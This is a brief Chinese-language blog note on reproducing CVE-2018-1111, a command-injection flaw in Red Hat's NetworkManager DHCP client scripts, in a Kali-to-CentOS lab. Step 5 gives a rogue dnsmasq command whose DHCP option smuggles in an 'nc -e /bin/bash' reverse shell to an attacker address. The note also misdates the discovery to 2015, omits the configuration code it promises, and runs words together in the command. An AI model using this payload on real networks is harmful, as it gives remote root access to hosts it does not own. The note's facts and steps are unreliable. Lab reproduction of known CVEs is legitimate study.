CVE-2018-1111 DHCP RCE漏洞復現

• 2019 年 10 月 7 日
• 筆記

2015年5月，在Red Hat Enterprise Linux（CVE-2018-1111）的多個版本的DHCP客戶端軟體包提供的NetworkManager腳本中發現了命令注入漏洞，隨後，RedHat提供了相應的修補程式。當系統使用含有該漏洞的NetworkManager並配置了DHCP協議時，攻擊者可以利用一個惡意的DHCP伺服器或者本地網路構造的DHCP響應，在該系統上以root許可權執行任意命令。

復現步驟：

1.kali配置

2. centos:網路：僅主機模式

3. 關閉虛擬機僅主機模式的DHCP功能

4.卡里下配置dns文件，新建文件，加入如下程式碼，作為dhcp伺服器：

5.kali終端下輸入：•dnsmasq-dC dnsmasq.conf –dhcp-option="252,malayke'&nc -e /bin/bash192.168.0.105 4567 #"

6.復現結果